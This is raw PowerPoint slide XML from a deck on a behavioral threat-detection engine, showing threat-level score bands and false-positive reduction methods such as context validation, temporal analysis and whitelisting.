                  <a:pt x="7032625" y="366786"/>
                  <a:pt x="7018411" y="381000"/>
                  <a:pt x="7000876" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="4260848"/>
            <a:ext cx="825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× 1.0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403350" y="4260848"/>
            <a:ext cx="141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Single indicator category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50850" y="4610098"/>
            <a:ext cx="7032625" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7032625" h="381000">
                <a:moveTo>
                  <a:pt x="31749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7000876" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7018411" y="0"/>
                  <a:pt x="7032625" y="14214"/>
                  <a:pt x="7032625" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7032625" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7032625" y="366786"/>
                  <a:pt x="7018411" y="381000"/>
                  <a:pt x="7000876" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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5" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="4705348"/>
            <a:ext cx="825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× 1.3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403350" y="4705348"/>
            <a:ext cx="1404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categories (2-3)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50850" y="5054598"/>
            <a:ext cx="7032625" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7032625" h="381000">
                <a:moveTo>
                  <a:pt x="31749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7000876" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7018411" y="0"/>
                  <a:pt x="7032625" y="14214"/>
                  <a:pt x="7032625" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7032625" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7032625" y="366786"/>
                  <a:pt x="7018411" y="381000"/>
                  <a:pt x="7000876" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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8" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="5149848"/>
            <a:ext cx="825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× 1.7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403350" y="5149848"/>
            <a:ext cx="1651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patterns (4+)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450850" y="5499098"/>
            <a:ext cx="7032625" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7032625" h="381000">
                <a:moveTo>
                  <a:pt x="31749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7000876" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7018411" y="0"/>
                  <a:pt x="7032625" y="14214"/>
                  <a:pt x="7032625" y="31749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7032625" y="349251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7032625" y="366786"/>
                  <a:pt x="7018411" y="381000"/>
                  <a:pt x="7000876" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31749" y="381000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14214" y="381000"/>
                  <a:pt x="0" y="366786"/>
                  <a:pt x="0" y="349251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1" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="5594348"/>
            <a:ext cx="825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× 2.0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403350" y="5594348"/>
            <a:ext cx="14605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 attack chain detected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7762875" y="1365250"/>
            <a:ext cx="4111625" cy="3778250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4111625" h="3778250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4111625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111625" y="3778250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="377825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4" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762875" y="1365250"/>
            <a:ext cx="31750" cy="3778250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="3778250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="3778250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3778250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5" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7925594" y="1524000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9922" y="9922"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15410" y="9922"/>
                  <a:pt x="19844" y="14356"/>
                  <a:pt x="19844" y="19844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19844" y="124023"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19844" y="126752"/>
                  <a:pt x="22076" y="128984"/>
                  <a:pt x="24805" y="128984"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148828" y="128984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="154316" y="128984"/>
                  <a:pt x="158750" y="133418"/>
                  <a:pt x="158750" y="138906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="158750" y="144394"/>
                  <a:pt x="154316" y="148828"/>
                  <a:pt x="148828" y="148828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24805" y="148828"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11100" y="148828"/>
                  <a:pt x="0" y="137728"/>
                  <a:pt x="0" y="124023"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="19844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14356"/>
                  <a:pt x="4434" y="9922"/>
                  <a:pt x="9922" y="9922"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39688" y="29766"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="39688" y="24278"/>
                  <a:pt x="44121" y="19844"/>
                  <a:pt x="49609" y="19844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="109141" y="19844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="114629" y="19844"/>
                  <a:pt x="119062" y="24278"/>
                  <a:pt x="119062" y="29766"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119062" y="35254"/>
                  <a:pt x="114629" y="39688"/>
                  <a:pt x="109141" y="39688"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49609" y="39688"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44121" y="39688"/>
                  <a:pt x="39688" y="35254"/>
                  <a:pt x="39688" y="29766"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49609" y="54570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89297" y="54570"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="94785" y="54570"/>
                  <a:pt x="99219" y="59004"/>
                  <a:pt x="99219" y="64492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99219" y="69980"/>
                  <a:pt x="94785" y="74414"/>
                  <a:pt x="89297" y="74414"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49609" y="74414"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44121" y="74414"/>
                  <a:pt x="39688" y="69980"/>
                  <a:pt x="39688" y="64492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39688" y="59004"/>
                  <a:pt x="44121" y="54570"/>
                  <a:pt x="49609" y="54570"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49609" y="89297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128984" y="89297"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134472" y="89297"/>
                  <a:pt x="138906" y="93731"/>
                  <a:pt x="138906" y="99219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138906" y="104707"/>
                  <a:pt x="134472" y="109141"/>
                  <a:pt x="128984" y="109141"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49609" y="109141"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44121" y="109141"/>
                  <a:pt x="39688" y="104707"/>
                  <a:pt x="39688" y="99219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39688" y="93731"/>
                  <a:pt x="44121" y="89297"/>
                  <a:pt x="49609" y="89297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6" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104187" y="1492250"/>
            <a:ext cx="3722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Threat Level Mapping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7921625" y="1809750"/>
            <a:ext cx="3825875" cy="635000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3825875" h="635000">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3794125" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3811648" y="0"/>
                  <a:pt x="3825875" y="14227"/>
                  <a:pt x="3825875" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3825875" y="603250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3825875" y="620773"/>
                  <a:pt x="3811648" y="635000"/>
                  <a:pt x="3794125" y="635000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31750" y="635000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14227" y="635000"/>
                  <a:pt x="0" y="620773"/>
                  <a:pt x="0" y="603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8" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921625" y="1809750"/>
            <a:ext cx="31750" cy="635000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="635000">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="635000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="635000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14227" y="635000"/>
                  <a:pt x="0" y="620773"/>
                  <a:pt x="0" y="603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00C95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9" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032750" y="1920774"/>
            <a:ext cx="396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05DF7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LOW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234242" y="1905000"/>
            <a:ext cx="51593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05DF7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0-25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032750" y="2190649"/>
            <a:ext cx="3675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 but likely benign. Legitimate software may exhibit similar patterns.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921625" y="2508149"/>
            <a:ext cx="3825875" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3825875" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3794125" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3811648" y="0"/>
                  <a:pt x="3825875" y="14227"/>
                  <a:pt x="3825875" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3825875" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3825875" y="779523"/>
                  <a:pt x="3811648" y="793750"/>
                  <a:pt x="3794125" y="793750"/>
                </a:cubicBez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B100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3" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921625" y="2508149"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:ln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0B10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4" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032750" y="2619173"/>
            <a:ext cx="650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DC7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MEDIUM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120339" y="2603399"/>
            <a:ext cx="62706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DC7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26-50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032750" y="2889048"/>
            <a:ext cx="3675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Investigate further. Unusual behavior requiring analyst attention and monitoring.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921625" y="3365298"/>
            <a:ext cx="3825875" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3825875" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3794125" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3811648" y="0"/>
                  <a:pt x="3825875" y="14227"/>
                  <a:pt x="3825875" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3825875" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3825875" y="779523"/>
                  <a:pt x="3811648" y="793750"/>
                  <a:pt x="3794125" y="793750"/>
                </a:cubicBez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6900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8" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921625" y="3365298"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:ln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F690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9" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032750" y="3476330"/>
            <a:ext cx="420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F890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1183045" y="3460548"/>
            <a:ext cx="563563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F890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51-75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032750" y="3746205"/>
            <a:ext cx="3675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Malicious behavior likely. Immediate investigation and containment recommended.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7921625" y="4222455"/>
            <a:ext cx="3825875" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3825875" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3794125" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3811648" y="0"/>
                  <a:pt x="3825875" y="14227"/>
                  <a:pt x="3825875" y="31750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3825875" y="762000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3825875" y="779523"/>
                  <a:pt x="3811648" y="793750"/>
                  <a:pt x="3794125" y="793750"/>
                </a:cubicBez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3" name="Shape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921625" y="4222455"/>
            <a:ext cx="31750" cy="793750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="793750">
                <a:moveTo>
                  <a:pt x="31750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="793750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14227" y="793750"/>
                  <a:pt x="0" y="779523"/>
                  <a:pt x="0" y="76200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FB2C3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4" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032750" y="4333480"/>
            <a:ext cx="690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FF646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11045429" y="4317705"/>
            <a:ext cx="698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00" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF646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76-100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032750" y="4603355"/>
            <a:ext cx="3675063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Active threat confirmed. Immediate containment and incident response required.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7762875" y="5270105"/>
            <a:ext cx="4111625" cy="2905125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4111625" h="2905125">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4111625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111625" y="2905125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2905125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8" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762875" y="5270105"/>
            <a:ext cx="31750" cy="2905125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="31750" h="2905125">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31750" y="2905125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2905125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9" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7925594" y="5428855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9922" y="19844"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5922" y="19844"/>
                  <a:pt x="2294" y="22262"/>
                  <a:pt x="744" y="25983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-806" y="29704"/>
                  <a:pt x="62" y="33951"/>
                  <a:pt x="2915" y="36773"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59531" y="93421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59531" y="128984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59531" y="131620"/>
                  <a:pt x="60585" y="134131"/>
                  <a:pt x="62446" y="135992"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="82290" y="155835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="85142" y="158688"/>
                  <a:pt x="89390" y="159525"/>
                  <a:pt x="93111" y="157975"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96831" y="156425"/>
                  <a:pt x="99219" y="152828"/>
                  <a:pt x="99219" y="148828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99219" y="93421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155835" y="36804"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="158688" y="33951"/>
                  <a:pt x="159525" y="29704"/>
                  <a:pt x="157975" y="25983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="156425" y="22262"/>
                  <a:pt x="152828" y="19844"/>
                  <a:pt x="148828" y="19844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9922" y="19844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0" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104187" y="5397105"/>
            <a:ext cx="372268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False Positive Reduction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7921625" y="574635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2" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159750" y="5714605"/>
            <a:ext cx="2778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Context Validation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8159750" y="5905105"/>
            <a:ext cx="277018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Correlates multiple indicators to confirm malicious intent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7921625" y="619085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5" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159750" y="6159105"/>
            <a:ext cx="35480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Temporal Analysis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8159750" y="6349605"/>
            <a:ext cx="35401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Analyzes timing patterns to distinguish malware from legitimate software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7921625" y="663535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63500" y="127000"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="98547" y="127000"/>
                  <a:pt x="127000" y="98547"/>
                  <a:pt x="127000" y="63500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127000" y="28453"/>
                  <a:pt x="98547" y="0"/>
                  <a:pt x="63500" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28453" y="0"/>
                  <a:pt x="0" y="28453"/>
                  <a:pt x="0" y="63500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="98547"/>
                  <a:pt x="28453" y="127000"/>
                  <a:pt x="63500" y="127000"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84435" y="52760"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="64591" y="84510"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63550" y="86171"/>
                  <a:pt x="61764" y="87213"/>
                  <a:pt x="59804" y="87313"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57845" y="87412"/>
                  <a:pt x="55959" y="86519"/>
                  <a:pt x="54794" y="84931"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42887" y="69056"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="40903" y="66427"/>
                  <a:pt x="41449" y="62706"/>
                  <a:pt x="44078" y="60722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46707" y="58737"/>
                  <a:pt x="50428" y="59283"/>
                  <a:pt x="52412" y="61913"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59110" y="70842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74340" y="46459"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76076" y="43681"/>
                  <a:pt x="79747" y="42813"/>
                  <a:pt x="82550" y="44574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85353" y="46335"/>
                  <a:pt x="86196" y="49981"/>
                  <a:pt x="84435" y="52784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8" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159750" y="6603605"/>
            <a:ext cx="353218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Whitelisting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8159750" y="6794105"/>
            <a:ext cx="3524250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Excludes known good software through digital signatures and reputation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i0.wp.com/c3c2d6fd60575d0abe08dc7cc8d1044d5772d882.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
          </a:blip>
          <a:srcRect t="6326" b="6326"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="7446768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7446768"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="7446768">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="7446768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7446768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1A1D21">
              <a:alpha val="9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Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368391" y="19949"/>
            <a:ext cx="3148869" cy="456104"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3148869" h="456104">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3148869" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148869" y="456104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="456104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" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368391" y="19949"/>
            <a:ext cx="35085" cy="456104"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35085" h="456104">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35085" y="456104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="456104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Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596443" y="160289"/>
            <a:ext cx="2792977" cy="1754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3" b="1" kern="0" spc="124" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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Future of Cybersecurity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350849" y="756732"/>
            <a:ext cx="11806066" cy="1578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4973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Adaptive Threat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4973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Detection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50849" y="2616231"/>
            <a:ext cx="1122717" cy="35085"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1122717" h="35085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1122717" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1122717" y="35085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35085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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350849" y="2931995"/>
            <a:ext cx="7964271" cy="13683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58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Behavioral Analysis Engine represents the evolution from signature-based detection to behavioral intelligence, enabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1658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proactive identification of zero-day threats and advanced persistent threats </a:t>
